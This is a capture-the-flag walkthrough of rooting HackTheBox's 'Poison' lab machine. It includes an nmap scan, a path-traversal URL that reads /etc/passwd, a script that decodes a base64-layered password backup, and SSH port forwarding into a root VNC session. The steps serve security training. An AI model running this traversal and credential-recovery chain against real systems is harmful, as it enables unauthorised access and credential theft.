1/31/2024
Explore the step-by-step process of hacking into the Poison machine on HackTheBox, a renowned platform for honing cybersecurity skills through hands-on challenges. This detailed writeup provides insights into the techniques, tools, and methodologies used to root the box.
I started this box because it was made with a Medium difficulty tag and it was running FreeBSD. But after finishing the machine, I think it should have been marked as an easy machine.
The box requires some knowledge of VNC and X Window Authorization. However, it is relatively simple otherwise.
The IP of the machine is 10.10.10.84
nmap -sC -sV -oA nmap/Poison 10.10.10.84
We see that port 22 and port 80 are open.
Entering listfiles.php as the script name returns:
Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )
Let's try to access this file by putting its filename in the Scriptname field.
This is base64, and it looks like it has been encoded 13 times. A quick bash script decodes it: we run a for loop 13 times, peeling off one layer per iteration.
#!/bin/bash
file="passwd.txt"
temp_file=$(mktemp)
# There are spaces in the file that shouldn't be there.
sed 's/ //g' "$file" > "$temp_file"
mv "$temp_file" "$file"
# Decode one base64 layer per iteration, 13 layers in total.
for (( i=1; i<=13; i++ ))
do
    base64 -d "$file" > "$file.tmp" && mv "$file.tmp" "$file"
done
cat "$file"
We get the password Charix!2#4%6&8(0. We don't know what it is used for, and we have no username to try over SSH.
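The same peeling step, as an added Python example that is not part of the original writeup: instead of hard-coding 13 iterations it strips stray whitespace and keeps decoding until the output stops being valid, printable base64, so it generalises to backups with an unknown number of layers. The sample blob is constructed here from the recovered password; the function names are this example's own.

```python
import base64
import binascii
import re

# Constructed sample: the page's recovered password wrapped in 13 base64
# layers, with line breaks injected to mimic the pasted pwdbackup.txt dump.
SAMPLE_PASSWORD = "Charix!2#4%6&8(0"


def encode_layers(plaintext: str, layers: int) -> str:
    """Build a test blob: base64-encode `layers` times, then wrap at 60 columns."""
    data = plaintext.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    text = data.decode()
    return "\n".join(text[i:i + 60] for i in range(0, len(text), 60))


def _is_printable(data: bytes) -> bool:
    return all(32 <= b < 127 for b in data)


def peel_base64(blob: str, max_layers: int = 64) -> tuple[bytes, int]:
    """Strip whitespace, then decode repeatedly until the result is no longer
    strict, printable base64. Returns (innermost payload, layers removed).
    A plaintext that happens to be valid base64 would be over-decoded, which is
    why the loop also refuses non-printable output and caps the layer count."""
    data = re.sub(rb"\s+", b"", blob.encode())
    layers = 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(data, validate=True)
        except (binascii.Error, ValueError):
            break  # e.g. the final password contains '!' and '#': not base64
        if not decoded or not _is_printable(decoded):
            break
        data = decoded
        layers += 1
    return data, layers


def recover_password(blob: str) -> str:
    payload, _ = peel_base64(blob)
    return payload.decode()


if __name__ == "__main__":
    blob = encode_layers(SAMPLE_PASSWORD, 13)
    print(recover_password(blob))
```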
So let us try a directory traversal attack to see if we can get the /etc/passwd file.
http:/browse.php?file=../../../../../../../../../../../../etc/passwd
The username is charix.
Now that we have the credentials, we can try to log in to ssh.
We get secret.zip, which is an encrypted file. Unfortunately, I cannot type any password in the SSH connection, so I will move the file out using scp.
scp charix@10.10.10.84:/home/charix/secret.zip secret.zip
Decrypting it gives us a binary file, secret. Right now we have no use for this file, so back to enumeration.
charix@Poison:~ % ps -auwwx
USER     PID %CPU %MEM   VSZ  RSS TT  STAT STARTED    TIME COMMAND
. . .
root     529  0.0  0.9 23620 8868 v0- I    00:48   0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
. . .
charix   922  0.0  0.3 21208 2652  1  R+   02:59   0:00.00 ps -auwwx
We see a VNC session running with root privileges on port 5901. We have the secret binary, and it could be used for cookie-based authentication.
To try it we need access to the VNC port, which is bound to localhost only, so we forward it through SSH (there is no point launching a VNC viewer from inside the SSH session). This is a worthwhile shot: try the lowest-hanging fruit first.
ssh -L5901:127.0.0.1:5901 charix@10.10.10.84
Now we can access the port on localhost:5901.
vncviewer 127.0.0.1:5901 -passwd secret